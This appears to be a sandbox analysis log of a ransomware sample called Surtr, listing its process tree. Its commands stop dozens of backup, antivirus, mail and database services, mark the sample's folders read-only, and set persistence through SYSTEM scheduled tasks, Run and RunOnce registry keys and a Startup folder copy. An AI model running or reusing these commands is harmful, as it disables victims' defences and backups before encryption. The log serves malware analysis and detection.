    C:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"
    3⤵
    PID:3020
  - - C:\Windows\system32\net.exe
      net stop "Symantec System Recovery"
      4⤵
      PID:2324
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Symantec System Recovery"
        5⤵
        
        PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
    3⤵
    PID:1228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
    3⤵
    PID:2296
  - - C:\Windows\system32\attrib.exe
      attrib +R /S "C:\ProgramData\Service"
      4⤵
      Views/modifies file attributes
      PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"
    3⤵
    PID:2992
  - - C:\Windows\system32\net.exe
      net stop "Veeam Backup Catalog Data Service"
      4⤵
      PID:2940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AcronisAgent"
    3⤵
    PID:2032
  - - C:\Windows\system32\net.exe
      net stop "AcronisAgent"
      4⤵
      PID:716
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AcronisAgent"
        5⤵
        
        PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"
    3⤵
    PID:3748
  - - C:\Windows\system32\net.exe
      net stop "AcrSch2Svc"
      4⤵
      PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Antivirus"
    3⤵
    PID:3568
  - - C:\Windows\system32\net.exe
      net stop "Antivirus"
      4⤵
      PID:3252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"
    3⤵
    PID:3764
  - - C:\Windows\system32\net.exe
      net stop "BackupExecAgentAccelerator"
      4⤵
      PID:1964
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecAgentAccelerator"
        5⤵
        
        PID:1216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"
    3⤵
    PID:204
  - - C:\Windows\system32\net.exe
      net stop "BackupExecAgentBrowser"
      4⤵
      PID:296
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecAgentBrowser"
        5⤵
        
        PID:264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"
    3⤵
    PID:3652
  - - C:\Windows\system32\net.exe
      net stop "BackupExecDeviceMediaService"
      4⤵
      PID:3616
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecDeviceMediaService"
        5⤵
        
        PID:272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"
    3⤵
    PID:760
  - - C:\Windows\system32\net.exe
      net stop "BackupExecJobEngine"
      4⤵
      PID:1884
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecJobEngine"
        5⤵
        
        PID:3880
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MBEndpointAgent"
        5⤵
        
        PID:3512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"
    3⤵
    PID:3336
  - - C:\Windows\system32\net.exe
      net stop "BackupExecManagementService"
      4⤵
      PID:1140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"
    3⤵
    PID:2132
  - - C:\Windows\system32\net.exe
      net stop "BackupExecRPCService"
      4⤵
      PID:2140
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecRPCService"
        5⤵
        
        PID:860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"
    3⤵
    PID:1536
  - - C:\Windows\system32\net.exe
      net stop "BackupExecVSSProvider"
      4⤵
      PID:3832
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecVSSProvider"
        5⤵
        
        PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
    3⤵
    PID:2292
  - - C:\Windows\system32\attrib.exe
      attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
      4⤵
      Views/modifies file attributes
      PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "EPSecurityService"
    3⤵
    PID:1900
  - - C:\Windows\system32\net.exe
      net stop "EPSecurityService"
      4⤵
      PID:2180
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "EPSecurityService"
        5⤵
        
        PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    PID:2300
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
      4⤵
      Creates scheduled task(s)
      PID:1500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "IISAdmin"
    3⤵
    PID:740
  - - C:\Windows\system32\net.exe
      net stop "IISAdmin"
      4⤵
      PID:1732
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "IISAdmin"
        5⤵
        
        PID:1260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"
    3⤵
    PID:3364
  - - C:\Windows\system32\net.exe
      net stop "IMAP4Svc"
      4⤵
      PID:792
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "IMAP4Svc"
        5⤵
        
        PID:1840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    3⤵
    PID:1796
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:3396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "macmnsvc"
    3⤵
    PID:3400
  - - C:\Windows\system32\net.exe
      net stop "macmnsvc"
      4⤵
      PID:360
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "macmnsvc"
        5⤵
        
        PID:3216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
    3⤵
    - Drops startup file
    PID:3716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "masvc"
    3⤵
    PID:3780
  - - C:\Windows\system32\net.exe
      net stop "masvc"
      4⤵
      PID:3748
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "masvc"
        5⤵
        
        PID:3428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:1640
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:1300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MBAMService"
    3⤵
    PID:1280
  - - C:\Windows\system32\net.exe
      net stop "MBAMService"
      4⤵
      PID:984
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MBAMService"
        5⤵
        
        PID:3964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:1188
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:4016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:3744
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:3980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"
    3⤵
    PID:3668
  - - C:\Windows\system32\net.exe
      net stop "MBEndpointAgent"
      4⤵
      PID:1884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:3652
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"
    3⤵
    PID:1852
  - - C:\Windows\system32\net.exe
      net stop "McAfeeEngineService"
      4⤵
      PID:3196
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeEngineService"
        5⤵
        
        PID:3664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"
    3⤵
    PID:2176
  - - C:\Windows\system32\net.exe
      net stop "McAfeeFramework"
      4⤵
      PID:2452
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeFramework"
        5⤵
        
        PID:3340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"
    3⤵
    PID:3292
  - - C:\Windows\system32\net.exe
      net stop "McAfeeFrameworkMcAfeeFramework"
      4⤵
      PID:3184
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"
        5⤵
        
        PID:3464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McShield"
    3⤵
    PID:1260
  - - C:\Windows\system32\net.exe
      net stop "McShield"
      4⤵
      PID:3300
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McShield"
        5⤵
        
        PID:3024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mfemms"
    3⤵
    PID:2484
  - - C:\Windows\system32\net.exe
      net stop "mfemms"
      4⤵
      PID:516
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mfemms"
        5⤵
        
        PID:3424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mfevtp"
    3⤵
    PID:2648
  - - C:\Windows\system32\net.exe
      net stop "mfevtp"
      4⤵
      PID:360
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mfevtp"
        5⤵
        
        PID:3400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MMS"
    3⤵
    PID:3716
  - - C:\Windows\system32\net.exe
      net stop "MMS"
      4⤵
      PID:3428
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MMS"
        5⤵
        
        PID:3748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mozyprobackup"
    3⤵
    PID:3780
  - - C:\Windows\system32\net.exe
      net stop "mozyprobackup"
      4⤵
      PID:1300
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mozyprobackup"
        5⤵
        
        PID:1640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MsDtsServer"
    3⤵
    PID:3996
  - - C:\Windows\system32\net.exe
      net stop "MsDtsServer"
      4⤵
      PID:1188
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer"
        5⤵
        
        PID:3964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"
    3⤵
    PID:984
  - - C:\Windows\system32\net.exe
      net stop "MsDtsServer100"
      4⤵
      PID:296
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer100"
        5⤵
        
        PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"
    3⤵
    PID:760
  - - C:\Windows\system32\net.exe
      net stop "MsDtsServer110"
      4⤵
      PID:3732
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer110"
        5⤵
        
        PID:820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeES"
    3⤵
    PID:1316
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeES"
      4⤵
      PID:636
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeES"
        5⤵
        
        PID:1388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"
    3⤵
    PID:2024
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeIS"
      4⤵
      PID:2580
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeIS"
        5⤵
        
        PID:1856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"
    3⤵
    PID:3616
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeMGMT"
      4⤵
      PID:1536
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeMGMT"
        5⤵
        
        PID:3832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"
    3⤵
    PID:2588
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeMTA"
      4⤵
      PID:2432
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeMTA"
        5⤵
        
        PID:2476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"
    3⤵
    PID:540
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeSA"
      4⤵
      PID:3032
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeSA"
        5⤵
        
        PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"
    3⤵
    PID:1580
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeSRS"
      4⤵
      PID:2696
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeSRS"
        5⤵
        
        PID:3868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"
    3⤵
    PID:3024
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$SQL_2008"
      4⤵
      PID:2936
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$SQL_2008"
        5⤵
        
        PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"
    3⤵
    PID:2324
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$SYSTEM_BGC"
      4⤵
      PID:2992
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"
        5⤵
        
        PID:1312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"
    3⤵
    PID:3644
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$TPS"
      4⤵
      PID:3308
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$TPS"
        5⤵
        
        PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"
    3⤵
    PID:3516
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$TPSAMA"
      4⤵
      PID:3348
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$TPSAMA"
        5⤵
        
        PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"
    3⤵
    PID:2892
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$BKUPEXEC"
      4⤵
      PID:4016
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"
        5⤵
        
        PID:1216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"
    3⤵
    PID:3964
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$ECWDB2"
      4⤵
      PID:1188
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$ECWDB2"
        5⤵
        
        PID:3996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"
    3⤵
    PID:1280
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PRACTICEMGT"
      4⤵
      PID:3880
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"
        5⤵
        
        PID:288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"
    3⤵
    PID:272
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PRACTTICEBGC"
      4⤵
      PID:3452
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"
        5⤵
        
        PID:60
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"
    3⤵
    PID:1924
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PROFXENGAGEMENT"
      4⤵
      PID:1988
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"
        5⤵
        
        PID:1336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"
    3⤵
    PID:1388
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SBSMONITORING"
      4⤵
      PID:636
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"
        5⤵
        
        PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"
    3⤵
    PID:1856
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SHAREPOINT"
      4⤵
      PID:2580
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"
        5⤵
        
        PID:2024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"
    3⤵
    PID:3832
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SQL_2008"
      4⤵
      PID:1536
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SQL_2008"
        5⤵
        
        PID:3616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"
    3⤵
    PID:2476
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SYSTEM_BGC"
      4⤵
      PID:2432
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"
        5⤵
        
        PID:2588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"
    3⤵
    PID:1920
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$TPS"
      4⤵
      PID:3032
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$TPS"
        5⤵
        
        PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"
    3⤵
    PID:1792
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$TPSAMA"
      4⤵
      PID:740
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$TPSAMA"
        5⤵
        
        PID:3292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:2816
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:3396
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
        5⤵
        
        PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"
    3⤵
    PID:1440
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$VEEAMSQL2012"
      4⤵
      PID:1796
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"
        5⤵
        
        PID:3812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"
    3⤵
    PID:516
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher"
      4⤵
      PID:3640
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher"
        5⤵
        
        PID:360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
    3⤵
    PID:3240
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
      4⤵
      PID:2648
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"
        5⤵
        
        PID:3656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"
    3⤵
    PID:3428
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SBSMONITORING"
      4⤵
      PID:3716
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"
        5⤵
        
        PID:1300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"
    3⤵
    PID:1640
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SHAREPOINT"
      4⤵
      PID:3608
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"
        5⤵
        
        PID:264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"
    3⤵
    PID:3056
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SQL_2008"
      4⤵
      PID:3780
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"
        5⤵
        
        PID:3568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"
    3⤵
    PID:3540
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SYSTEM_BGC"
      4⤵
      PID:204
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"
        5⤵
        
        PID:296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"
    3⤵
    PID:3244
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$TPS"
      4⤵
      PID:4012
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"
        5⤵
        
        PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"
    3⤵
    PID:820
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$TPSAMA"
      4⤵
      PID:984
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"
        5⤵
        
        PID:2132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"
    3⤵
    PID:3676
  - - C:\Windows\system32\net.exe
      net stop "MSSQLSERVER"
      4⤵
      PID:760
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLSERVER"
        5⤵
        
        PID:1884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"
    3⤵
    PID:3740
  - - C:\Windows\system32\net.exe
      net stop "MSSQLServerADHelper100"
      4⤵
      PID:1872
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerADHelper100"
        5⤵
        
        PID:3196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"
    3⤵
    PID:2104
  - - C:\Windows\system32\net.exe
      net stop "MSSQLServerOLAPService"
      4⤵
      PID:1644
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerOLAPService"
        5⤵
        
        PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MySQL80"
    3⤵
    PID:3668
  - - C:\Windows\system32\net.exe
      net stop "MySQL80"
      4⤵
      PID:372
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MySQL80"
        5⤵
        
        PID:1900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MySQL57"
    3⤵
    PID:2872
  - - C:\Windows\system32\net.exe
      net stop "MySQL57"
      4⤵
      PID:1424
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MySQL57"
        5⤵
        
        PID:3464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"
    3⤵
    PID:1732
  - - C:\Windows\system32\net.exe
      net stop "OracleClientCache80"
      4⤵
      PID:2696
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "OracleClientCache80"
        5⤵
        
        PID:3020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "PDVFSService"
    3⤵
    PID:2936
  - - C:\Windows\system32\net.exe
      net stop "PDVFSService"
      4⤵
      PID:1224
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "PDVFSService"
        5⤵
        
        PID:1840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "POP3Svc"
    3⤵
    PID:2484
  - - C:\Windows\system32\net.exe
      net stop "POP3Svc"
      4⤵
      PID:1312
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "POP3Svc"
        5⤵
        
        PID:448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer"
    3⤵
    PID:384
  - - C:\Windows\system32\net.exe
      net stop "ReportServer"
      4⤵
      PID:2032
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer"
        5⤵
        
        PID:1284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"
    3⤵
    PID:3468
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$SQL_2008"
      4⤵
      PID:1300
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$SQL_2008"
        5⤵
        
        PID:3716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"
    3⤵
    PID:3428
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$SYSTEM_BGC"
      4⤵
      PID:3996
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"
        5⤵
        
        PID:4016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"
    3⤵
    PID:4080
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$TPS"
      4⤵
      PID:3540
